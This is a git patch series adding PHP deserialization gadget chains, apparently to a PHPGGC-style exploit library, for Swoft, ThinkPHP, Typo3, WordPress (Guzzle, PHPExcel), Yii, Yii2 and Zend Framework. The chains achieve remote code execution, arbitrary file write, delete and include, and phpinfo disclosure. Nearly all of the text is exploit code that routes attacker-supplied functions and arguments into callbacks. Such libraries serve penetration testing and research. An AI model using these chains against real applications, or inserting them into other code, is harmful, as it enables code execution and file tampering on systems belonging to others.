mode 100644 gadgetchains/Swoft/RCE/1/chain.php create mode 100644 gadgetchains/Swoft/RCE/1/gadgets.php diff --git a/gadgetchains/Swoft/FD/1/chain.php b/gadgetchains/Swoft/FD/1/chain.php new file mode 100644 index 00000000..31c55338 --- /dev/null +++ b/gadgetchains/Swoft/FD/1/chain.php @@ -0,0 +1,15 @@ +db = new \Swoft\Http\Session\HttpSession($path); + } + } +} + +namespace Swoft\Http\Session +{ + class HttpSession + { + private $handler; + private $sessionId; + + function __construct($path) + { + $parts = explode('/',$path); + $this->sessionId = array_pop($parts); + $prePath = implode('/',$parts); + $this->handler = new \Swoft\Http\Session\Handler\FileHandler($prePath); + } + } +} + +namespace Swoft\Http\Session\Handler +{ + class FileHandler + { + private $savePath; + protected $prefix=''; + + function __construct($path) + { + $this->savePath = $path; + } + } +} \ No newline at end of file diff --git a/gadgetchains/Swoft/FW/1/chain.php b/gadgetchains/Swoft/FW/1/chain.php new file mode 100644 index 00000000..97e9157b --- /dev/null +++ b/gadgetchains/Swoft/FW/1/chain.php @@ -0,0 +1,18 @@ +rollbarNotifier = new \PHPUnit\Runner\ResultCacheExtension($path, $data); + } + } +} + +namespace PHPUnit\Runner +{ + + class ResultCacheExtension + { + private $cache; + + function __construct($path, $data) + { + $this->cache = new DefaultTestResultCache($path, $data); + } + } + + class DefaultTestResultCache + { + private $cacheFilename; + private $defects; + + function __construct($path, $data) + { + $this->cacheFilename = $path; + $this->defects = $data; + } + + } +} \ No newline at end of file diff --git a/gadgetchains/Swoft/FW/2/chain.php b/gadgetchains/Swoft/FW/2/chain.php new file mode 100644 index 00000000..d578463f --- /dev/null +++ b/gadgetchains/Swoft/FW/2/chain.php @@ -0,0 +1,18 @@ +socket = new \Swoft\Cache\Adapter\FileAdapter($path, $data); + } + } +} + +namespace Swoft\Cache\Adapter +{ + class ArrayAdapter + { + private $data; + + function __construct($data) + { + $this->data = [$data]; + } + } + + class FileAdapter extends ArrayAdapter + { + protected $dataFile; + private $serializer; + + function __construct($path, $data) + { + $this->dataFile = $path; + parent::__construct($data); + $this->serializer = new \Swoft\Serialize\PhpSerializer(); + } + } +} + +namespace Swoft\Serialize +{ + class PhpSerializer + { + function __construct() + { + } + } +} \ No newline at end of file diff --git a/gadgetchains/Swoft/RCE/1/chain.php b/gadgetchains/Swoft/RCE/1/chain.php new file mode 100644 index 00000000..a02aaf26 --- /dev/null +++ b/gadgetchains/Swoft/RCE/1/chain.php @@ -0,0 +1,18 @@ +db = new \Swoft\Http\Session\HttpSession($function, $parameter); + } + } +} + +namespace Swoft\Http\Session +{ + class HttpSession + { + private $handler; + private $sessionId; + + function __construct($function, $parameter) + { + $this->sessionId = 'x'; + $this->handler = new \Swoft\Console\Style\Style($function, $parameter); + } + } +} + +namespace Swoft\Console\Style +{ + class Style + { + private $styles; + + function __construct($function, $parameter) + { + $this->styles = new \Dotenv\Environment\DotenvVariables($function, $parameter); + } + } +} + +namespace Dotenv\Environment +{ + class DotenvVariables + { + protected $adapters; + + function __construct($function, $parameter) + { + $this->adapters = new \PhpOption\LazyOption($function, $parameter); + } + } +} + +namespace PhpOption +{ + class LazyOption + { + private $callback; + private $arguments; + + function __construct($function, $parameter) + { + $this->callback = $function; + $this->arguments = [$parameter]; + } + } +} \ No newline at end of file From 7d47e3fe6da254443709462ed1dc7857ab91328d Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:16:40 +0800 Subject: [PATCH 20/31] Add files via upload --- gadgetchains/ThinkPHP/RCE/5/chain.php | 17 ++++++ gadgetchains/ThinkPHP/RCE/5/gadgets.php | 73 +++++++++++++++++++++++++ 2 files changed, 90 insertions(+) create mode 100644 gadgetchains/ThinkPHP/RCE/5/chain.php create mode 100644 gadgetchains/ThinkPHP/RCE/5/gadgets.php diff --git a/gadgetchains/ThinkPHP/RCE/5/chain.php b/gadgetchains/ThinkPHP/RCE/5/chain.php new file mode 100644 index 00000000..c2a1378b --- /dev/null +++ b/gadgetchains/ThinkPHP/RCE/5/chain.php @@ -0,0 +1,17 @@ +pool = new \think\model\relation\HasMany($func, $param); + } + } +} + +namespace think\model\relation +{ + class HasMany + { + protected $query=true; + protected $parent; + protected $localKey='key'; + + function __construct($func, $param) + { + $this->parent = new \think\model\Pivot($func, $param); + } + } +} + +namespace think\model\concern +{ + trait Attribute + { + private $data; + private $withAttr; + protected $json; + protected $jsonAssoc; + protected $strict=true; + } +} + +namespace think +{ + abstract class Model + { + use \think\model\concern\Attribute; + + private $data; + private $withAttr; + protected $json; + protected $jsonAssoc; + + function __construct($func, $param) + { + $this->data = ["key" => ["key" => $param]]; + $this->jsonAssoc = true; + $this->withAttr = ["key" => ["key" => $func]]; + $this->json = ["key"]; + } + } +} + +namespace think\model +{ + use \think\Model; + + class Pivot extends Model + { + } +} \ No newline at end of file From e1115aee9525e14004a81666def4d8b3dd98b8ef Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:17:35 +0800 Subject: [PATCH 21/31] Add files via upload --- gadgetchains/ThinkPHP/FW/3/chain.php | 18 ++++++++++++++ gadgetchains/ThinkPHP/FW/3/gadgets.php | 33 ++++++++++++++++++++++++++ 2 files changed, 51 insertions(+) create mode 100644 gadgetchains/ThinkPHP/FW/3/chain.php create mode 100644 gadgetchains/ThinkPHP/FW/3/gadgets.php diff --git a/gadgetchains/ThinkPHP/FW/3/chain.php b/gadgetchains/ThinkPHP/FW/3/chain.php new file mode 100644 index 00000000..8e1160a0 --- /dev/null +++ b/gadgetchains/ThinkPHP/FW/3/chain.php @@ -0,0 +1,18 @@ +file = $remote_path; + $this->complete = $data; + $this->adapter = new \League\Flysystem\Adapter\Local(); + } + } +} + +namespace League\Flysystem\Adapter +{ + class Local + { + protected $pathPrefix=''; + protected $writeFlags=0; + + function __construct() + { + } + } +} \ No newline at end of file From 45ba17d05736770d13eee918a4fb1110226360b7 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:19:48 +0800 Subject: [PATCH 22/31] Add files via upload --- gadgetchains/Typo3/FW/1/chain.php | 18 +++++++ gadgetchains/Typo3/FW/1/gadgets.php | 33 ++++++++++++ gadgetchains/Typo3/FW/2/chain.php | 18 +++++++ gadgetchains/Typo3/FW/2/gadgets.php | 82 +++++++++++++++++++++++++++++ 4 files changed, 151 insertions(+) create mode 100644 gadgetchains/Typo3/FW/1/chain.php create mode 100644 gadgetchains/Typo3/FW/1/gadgets.php create mode 100644 gadgetchains/Typo3/FW/2/chain.php create mode 100644 gadgetchains/Typo3/FW/2/gadgets.php diff --git a/gadgetchains/Typo3/FW/1/chain.php b/gadgetchains/Typo3/FW/1/chain.php new file mode 100644 index 00000000..d8617a08 --- /dev/null +++ b/gadgetchains/Typo3/FW/1/chain.php @@ -0,0 +1,18 @@ +dataCache = new \TYPO3\CMS\Core\Cache\Backend\FileBackend($path); + $this->classSchemata = $data; + } + } +} + +namespace TYPO3\CMS\Core\Cache\Backend +{ + class FileBackend + { + protected $cacheDirectory; + protected $cacheEntryFileExtension; + protected $defaultLifetime=0; + + public function __construct($path) { + $info = pathinfo($path); + $this->cacheDirectory = $info["dirname"] . '/'; + $this->cacheEntryFileExtension = '/../' . $info['basename']; + } + } +} \ No newline at end of file diff --git a/gadgetchains/Typo3/FW/2/chain.php b/gadgetchains/Typo3/FW/2/chain.php new file mode 100644 index 00000000..555ce6c1 --- /dev/null +++ b/gadgetchains/Typo3/FW/2/chain.php @@ -0,0 +1,18 @@ +extensionBackupPath = new \TYPO3\CMS\Backend\Template\Components\Buttons\InputButton($path, $data); + } + } +} + +namespace TYPO3\CMS\Backend\Template\Components\Buttons +{ + class InputButton + { + protected $name=''; + protected $classes=''; + protected $value=''; + protected $form=''; + protected $title=''; + protected $icon; + + public function __construct($path, $data) { + $this->icon = new \TYPO3\CMS\Backend\View\BackendTemplateView($path, $data); + } + } +} + +namespace TYPO3\CMS\Backend\View +{ + class BackendTemplateView + { + protected $templateView; + protected $moduleTemplate; + + public function __construct($path, $data) { + $this->templateView = new \TYPO3\CMS\Extbase\Mvc\View\EmptyView(); + $this->moduleTemplate = new \TYPO3\CMS\Install\FolderStructure\FileNode($path, $data); + } + } +} + +namespace TYPO3\CMS\Extbase\Mvc\View +{ + class EmptyView + { + public function __construct() { + } + } +} + +namespace TYPO3\CMS\Install\FolderStructure +{ + class FileNode + { + protected $parent; + protected $targetContent; + protected $name; + + public function __construct($path, $data) { + $info = pathinfo($path); + $this->name = $info['basename']; + $this->parent = new \TYPO3\CMS\Install\FolderStruct\RootNode($info['dirname']); + $this->targetContent = $data; + } + } +} + +namespace TYPO3\CMS\Install\FolderStruct +{ + class RootNode + { + protected $name; + + public function __construct($path) { + $this->name = $path; + } + } +} \ No newline at end of file From d176432b3832b2b32d7c86a12726782a7f7172c8 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:20:48 +0800 Subject: [PATCH 23/31] Add files via upload --- gadgetchains/WordPress/Guzzle/RCE/3/chain.php | 21 +++++++++++++++++++ .../WordPress/Guzzle/RCE/3/gadgets.php | 20 ++++++++++++++++++ 2 files changed, 41 insertions(+) create mode 100644 gadgetchains/WordPress/Guzzle/RCE/3/chain.php create mode 100644 gadgetchains/WordPress/Guzzle/RCE/3/gadgets.php diff --git a/gadgetchains/WordPress/Guzzle/RCE/3/chain.php b/gadgetchains/WordPress/Guzzle/RCE/3/chain.php new file mode 100644 index 00000000..af7cb9a0 --- /dev/null +++ b/gadgetchains/WordPress/Guzzle/RCE/3/chain.php @@ -0,0 +1,21 @@ +$parameter], $function) + ); + } +} \ No newline at end of file diff --git a/gadgetchains/WordPress/Guzzle/RCE/3/gadgets.php b/gadgetchains/WordPress/Guzzle/RCE/3/gadgets.php new file mode 100644 index 00000000..62ff746d --- /dev/null +++ b/gadgetchains/WordPress/Guzzle/RCE/3/gadgets.php @@ -0,0 +1,20 @@ +streams = $streams; + } + } +} \ No newline at end of file From 3f1d9de3e0032509d4f7ab8e343fd2f3b2fd8aeb Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:22:16 +0800 Subject: [PATCH 24/31] Add files via upload --- .../WordPress/PHPExcel/RCE/7/chain.php | 23 ++++++++++++ .../WordPress/PHPExcel/RCE/7/gadgets.php | 19 ++++++++++ .../WordPress/PHPExcel/RCE/8/chain.php | 23 ++++++++++++ .../WordPress/PHPExcel/RCE/8/gadgets.php | 37 +++++++++++++++++++ .../WordPress/PHPExcel/RCE/9/chain.php | 23 ++++++++++++ .../WordPress/PHPExcel/RCE/9/gadgets.php | 21 +++++++++++ 6 files changed, 146 insertions(+) create mode 100644 gadgetchains/WordPress/PHPExcel/RCE/7/chain.php create mode 100644 gadgetchains/WordPress/PHPExcel/RCE/7/gadgets.php create mode 100644 gadgetchains/WordPress/PHPExcel/RCE/8/chain.php create mode 100644 gadgetchains/WordPress/PHPExcel/RCE/8/gadgets.php create mode 100644 gadgetchains/WordPress/PHPExcel/RCE/9/chain.php create mode 100644 gadgetchains/WordPress/PHPExcel/RCE/9/gadgets.php diff --git a/gadgetchains/WordPress/PHPExcel/RCE/7/chain.php b/gadgetchains/WordPress/PHPExcel/RCE/7/chain.php new file mode 100644 index 00000000..743114e5 --- /dev/null +++ b/gadgetchains/WordPress/PHPExcel/RCE/7/chain.php @@ -0,0 +1,23 @@ +_text = $_text; + } +} + +class PHPExcel_RichText { + private $_richTextElements; + + public function __construct($richTextElements) { + $this->_richTextElements = $richTextElements; + } +} \ No newline at end of file diff --git a/gadgetchains/WordPress/PHPExcel/RCE/8/chain.php b/gadgetchains/WordPress/PHPExcel/RCE/8/chain.php new file mode 100644 index 00000000..949c60fe --- /dev/null +++ b/gadgetchains/WordPress/PHPExcel/RCE/8/chain.php @@ -0,0 +1,23 @@ +_currentObjectID = $_currentObjectID; + $this->_currentObject = new \PHPExcel_Cell(); + $this->_memcache = new \WP_Object_Cache(); + } +} + +class WP_Object_Cache +{ + public function __construct() { + } +} + +class PHPExcel_Cell +{ + public function __construct() { + } +} + +class PHPExcel_RichText { + private $_richTextElements; + + public function __construct($richTextElements) { + $this->_richTextElements = $richTextElements; + } +} \ No newline at end of file diff --git a/gadgetchains/WordPress/PHPExcel/RCE/9/chain.php b/gadgetchains/WordPress/PHPExcel/RCE/9/chain.php new file mode 100644 index 00000000..62aa2abf --- /dev/null +++ b/gadgetchains/WordPress/PHPExcel/RCE/9/chain.php @@ -0,0 +1,23 @@ +_TableName = $_TableName; + $this->_DBHandle = new SQLiteDatabase(':memory:'); // require extension + } +} + +class PHPExcel_RichText { + private $_richTextElements; + + public function __construct($richTextElements) { + $this->_richTextElements = $richTextElements; + } +} \ No newline at end of file From 6e038aa0fd10495218581dbc6618e267915eff2c Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:23:24 +0800 Subject: [PATCH 25/31] Add files via upload --- gadgetchains/Yii/RCE/3/chain.php | 20 +++++++++ gadgetchains/Yii/RCE/3/gadgets.php | 65 ++++++++++++++++++++++++++++++ 2 files changed, 85 insertions(+) create mode 100644 gadgetchains/Yii/RCE/3/chain.php create mode 100644 gadgetchains/Yii/RCE/3/gadgets.php diff --git a/gadgetchains/Yii/RCE/3/chain.php b/gadgetchains/Yii/RCE/3/chain.php new file mode 100644 index 00000000..a664d1dc --- /dev/null +++ b/gadgetchains/Yii/RCE/3/chain.php @@ -0,0 +1,20 @@ +params = new CMapIterator($function, $param); + } +} + +class CMapIterator +{ + private $_d; + private $_keys; + private $_key; + + function __construct($function, $param) + { + $this->_keys = [$param]; + $this->_key = $param; + $this->_d = new CForm($function); + } +} + +class CForm +{ + private $_elements; + + function __construct($function) + { + $this->_elements = new PHPUnit_Extensions_Selenium2TestCase_Session($function); + } +} + +class PHPUnit_Extensions_Selenium2TestCase_Session +{ + protected $commands; + protected $url; + protected $driver; + + function __construct($function) + { + $this->commands = ['itemAt' => $function]; + $this->url = new PHPUnit_Extensions_Selenium2TestCase_URL(); + $this->driver = new DocBlox_Parallel_Worker(); + } +} + +class PHPUnit_Extensions_Selenium2TestCase_URL +{ + function __construct() + { + + } +} + +class DocBlox_Parallel_Worker +{ + function __construct() + { + + } +} \ No newline at end of file From 7429a818ad361d3c7ab33b909146be90b63856d8 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:24:19 +0800 Subject: [PATCH 26/31] Add files via upload --- gadgetchains/Yii2/RCE/3/chain.php | 21 +++++++++++++++ gadgetchains/Yii2/RCE/3/gadgets.php | 40 +++++++++++++++++++++++++++++ gadgetchains/Yii2/RCE/4/chain.php | 21 +++++++++++++++ gadgetchains/Yii2/RCE/4/gadgets.php | 40 +++++++++++++++++++++++++++++ 4 files changed, 122 insertions(+) create mode 100644 gadgetchains/Yii2/RCE/3/chain.php create mode 100644 gadgetchains/Yii2/RCE/3/gadgets.php create mode 100644 gadgetchains/Yii2/RCE/4/chain.php create mode 100644 gadgetchains/Yii2/RCE/4/gadgets.php diff --git a/gadgetchains/Yii2/RCE/3/chain.php b/gadgetchains/Yii2/RCE/3/chain.php new file mode 100644 index 00000000..8ca74d46 --- /dev/null +++ b/gadgetchains/Yii2/RCE/3/chain.php @@ -0,0 +1,21 @@ +_dataReader = new \Faker\ValidGenerator($function,$param); + } + } +} + +namespace Faker +{ + class ValidGenerator + { + protected $generator; + protected $maxRetries; + protected $validator; + + function __construct($function,$param) + { + $this->maxRetries = 1; + $this->validator = $function; + $this->generator = new \Faker\DefaultGenerator($param); + } + } + + class DefaultGenerator{ + protected $default; + + function __construct($param) + { + $this->default = $param; + } + } +} diff --git a/gadgetchains/Yii2/RCE/4/chain.php b/gadgetchains/Yii2/RCE/4/chain.php new file mode 100644 index 00000000..a87fdd65 --- /dev/null +++ b/gadgetchains/Yii2/RCE/4/chain.php @@ -0,0 +1,21 @@ +processes = [new \Faker\ValidGenerator($function,$param)]; + } + } +} + +namespace Faker +{ + class ValidGenerator + { + protected $generator; + protected $maxRetries; + protected $validator; + + function __construct($function,$param) + { + $this->maxRetries = 1; + $this->validator = $function; + $this->generator = new \Faker\DefaultGenerator($param); + } + } + + class DefaultGenerator{ + protected $default; + + function __construct($param) + { + $this->default = $param; + } + } +} \ No newline at end of file From 05aecd0efea00c6d3e26d7c37956b584dc74bfd6 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:24:50 +0800 Subject: [PATCH 27/31] Add files via upload --- gadgetchains/Yii2/INFO/1/chain.php | 16 +++++++ gadgetchains/Yii2/INFO/1/gadgets.php | 63 ++++++++++++++++++++++++++++ 2 files changed, 79 insertions(+) create mode 100644 gadgetchains/Yii2/INFO/1/chain.php create mode 100644 gadgetchains/Yii2/INFO/1/gadgets.php diff --git a/gadgetchains/Yii2/INFO/1/chain.php b/gadgetchains/Yii2/INFO/1/chain.php new file mode 100644 index 00000000..148b62bb --- /dev/null +++ b/gadgetchains/Yii2/INFO/1/chain.php @@ -0,0 +1,16 @@ +_dataReader = new \Prophecy\Prophecy\ObjectProphecy(); + } + } +} + +namespace Prophecy\Prophecy +{ + class ObjectProphecy + { + private $methodProphecies; + private $revealer; + + function __construct() + { + $this->revealer = new Revealer(); + $this->methodProphecies = new \Symfony\Component\DomCrawler\Form(); + } + } + + class Revealer{ + + function __construct() + { + + } + } +} + +namespace Symfony\Component\DomCrawler +{ + class Form + { + private $fields; + + function __construct() + { + $this->fields = new \Symfony\Component\Console\CommandLoader\FactoryCommandLoader(); + } + } +} + +namespace Symfony\Component\Console\CommandLoader +{ + class FactoryCommandLoader + { + private $factories = ["close"=>"phpinfo"]; + + function __construct() + { + + } + } +} \ No newline at end of file From d6df11ab797db36756962306e2751d447758bf18 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:26:09 +0800 Subject: [PATCH 28/31] Add files via upload --- gadgetchains/ZendFramework/FD/2/chain.php | 17 +++++++++++++++ gadgetchains/ZendFramework/FD/2/gadgets.php | 24 +++++++++++++++++++++ 2 files changed, 41 insertions(+) create mode 100644 gadgetchains/ZendFramework/FD/2/chain.php create mode 100644 gadgetchains/ZendFramework/FD/2/gadgets.php diff --git a/gadgetchains/ZendFramework/FD/2/chain.php b/gadgetchains/ZendFramework/FD/2/chain.php new file mode 100644 index 00000000..3a9c46a2 --- /dev/null +++ b/gadgetchains/ZendFramework/FD/2/chain.php @@ -0,0 +1,17 @@ +_backend = new \Zend_Cache_Backend_Static($remote_path); + $this->_tags = ["x"]; + } +} + +class Zend_Cache_Backend_Static +{ + protected $_tagged; + protected $_options=['public_dir'=>'']; + + public function __construct($remote_path) + { + $this->_tagged = [$remote_path=>["tags"=>["x"],"extension"=>""]]; + } +} \ No newline at end of file From 233401e4018063fa068c0b64419a51fc4edc85a3 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:26:43 +0800 Subject: [PATCH 29/31] Add files via upload --- gadgetchains/ZendFramework/FI/1/chain.php | 17 ++++++++ gadgetchains/ZendFramework/FI/1/gadgets.php | 45 +++++++++++++++++++++ 2 files changed, 62 insertions(+) create mode 100644 gadgetchains/ZendFramework/FI/1/chain.php create mode 100644 gadgetchains/ZendFramework/FI/1/gadgets.php diff --git a/gadgetchains/ZendFramework/FI/1/chain.php b/gadgetchains/ZendFramework/FI/1/chain.php new file mode 100644 index 00000000..768a3a53 --- /dev/null +++ b/gadgetchains/ZendFramework/FI/1/chain.php @@ -0,0 +1,17 @@ +_children = [new \Zend_Service_Twitter($file)]; + } + +} + +class Zend_Service_Twitter +{ + protected $oauthConsumer='Zend_Cache_Core'; + protected $methodType; + + public function __construct($file) + { + $this->methodType = new \Zend_Form($file); + } +} + +class Zend_Form +{ + protected $_decorators; + protected $_loaders; + + public function __construct($file) + { + $this->_decorators = ['k'=>['decorator'=>$file,'options'=>'options']]; + $this->_loaders = ['DECORATOR'=>new \Zend_Loader_PluginLoader()]; + } +} + +class Zend_Loader_PluginLoader +{ + protected $_loadedPlugins=[]; + protected $_prefixToPaths=[''=>['']]; + + public function __construct() + { + } +} \ No newline at end of file From 041f70bd2c4a61106db54bb929232c913916fe0f Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:27:09 +0800 Subject: [PATCH 30/31] Add files via upload --- gadgetchains/ZendFramework/FW/1/chain.php | 18 +++++++ gadgetchains/ZendFramework/FW/1/gadgets.php | 60 +++++++++++++++++++++ 2 files changed, 78 insertions(+) create mode 100644 gadgetchains/ZendFramework/FW/1/chain.php create mode 100644 gadgetchains/ZendFramework/FW/1/gadgets.php diff --git a/gadgetchains/ZendFramework/FW/1/chain.php b/gadgetchains/ZendFramework/FW/1/chain.php new file mode 100644 index 00000000..b76884f0 --- /dev/null +++ b/gadgetchains/ZendFramework/FW/1/chain.php @@ -0,0 +1,18 @@ +_backend = new \Zend_Log($path, $data); + $this->_tags = 'any'; + } +} + + +class Zend_Log +{ + protected $_priorities; + protected $_writers; + protected $_timestampFormat = 'c'; + protected $_extras = []; + protected $_filters = []; + + public function __construct($path, $data) + { + $this->_priorities = [1=>'CLEAN']; + $this->_writers = [new \Zend_CodeGenerator_Php_File($path, $data)]; + } +} + +abstract class Zend_CodeGenerator_Php_Abstract +{ + protected $_isSourceDirty = false; + + public function __construct() + { + } +} + +class Zend_CodeGenerator_Php_File extends \Zend_CodeGenerator_Php_Abstract +{ + protected $_filename; + protected $_docblock; + protected $_sourceContent; + protected $_classes = []; + + public function __construct($path, $data) + { + $this->_filename = $path; + $this->_docblock = new \Zend_CodeGenerator_Php_Docblock(); + $this->_sourceContent = $data; + } +} + +class Zend_CodeGenerator_Php_Docblock extends \Zend_CodeGenerator_Php_Abstract +{ + public function __construct() + { + } +} \ No newline at end of file From 6df9518149feb4e9439a69e1fd1ad9b85a896df5 Mon Sep 17 00:00:00 2001 From: CyanM0un <75713958+CyanM0un@users.noreply.github.com> Date: Fri, 15 Sep 2023 23:28:02 +0800 Subject: [PATCH 31/31] Add files via upload --- gadgetchains/ZendFramework/RCE/6/chain.php | 18 +++++++ gadgetchains/ZendFramework/RCE/6/gadgets.php | 39 ++++++++++++++ gadgetchains/ZendFramework/RCE/7/chain.php | 18 +++++++ gadgetchains/ZendFramework/RCE/7/gadgets.php | 56 ++++++++++++++++++++ 4 files changed, 131 insertions(+) create mode 100644 gadgetchains/ZendFramework/RCE/6/chain.php create mode 100644 gadgetchains/ZendFramework/RCE/6/gadgets.php create mode 100644 gadgetchains/ZendFramework/RCE/7/chain.php create mode 100644 gadgetchains/ZendFramework/RCE/7/gadgets.php diff --git a/gadgetchains/ZendFramework/RCE/6/chain.php b/gadgetchains/ZendFramework/RCE/6/chain.php new file mode 100644 index 00000000..8b637637 --- /dev/null +++ b/gadgetchains/ZendFramework/RCE/6/chain.php @@ -0,0 +1,18 @@ +config = ['persistent'=>0,'logfile'=>new \Zend_Tag_Cloud($function, $parameter)]; + } +} + +class Zend_Tag_Cloud +{ + protected $_tags; + protected $_tagDecorator; + + public function __construct($function, $parameter) + { + $this->_tags = $function; + $this->_tagDecorator = new \Zend_Form_Decorator_Callback($parameter); + } +} + +class Zend_Form_Decorator_Callback +{ + protected $_callback; + protected $_placement='x'; + protected $_options=[]; + protected $_separator='x'; + protected $_element; + + public function __construct($parameter) + { + $this->_callback = "call_user_func"; + $this->_element = $parameter; + } +} diff --git a/gadgetchains/ZendFramework/RCE/7/chain.php b/gadgetchains/ZendFramework/RCE/7/chain.php new file mode 100644 index 00000000..0e14be87 --- /dev/null +++ b/gadgetchains/ZendFramework/RCE/7/chain.php @@ -0,0 +1,18 @@ +stream_name = new \Zend_Dojo_View_Helper_Dojo_Container($function, $parameter); + } +} + +class Zend_Dojo_View_Helper_Dojo_Container +{ + protected $_enabled=true; + public $view; + protected $_localPath='x'; + protected $_stylesheetModules=[]; + protected $_stylesheets=[]; + protected $_registerDojoStylesheet=false; + protected $_modulePaths; + + public function __construct($function, $parameter) + { + $this->view = new \Zend_View($function); + $this->_modulePaths = [$parameter=>""]; + } +} + +class Zend_View_Helper_Doctype +{ + public function __construct() + { + } +} + +abstract class Zend_View_Abstract +{ + private $_escape; + private $_helper; + + public function __construct($function) + { + $this->_escape = $function; + $this->_helper = ["Doctype"=>new \Zend_View_Helper_Doctype()]; + } +} + +class Zend_View extends \Zend_View_Abstract +{ + public function __construct($function) + { + parent::__construct($function); + } +} \ No newline at end of file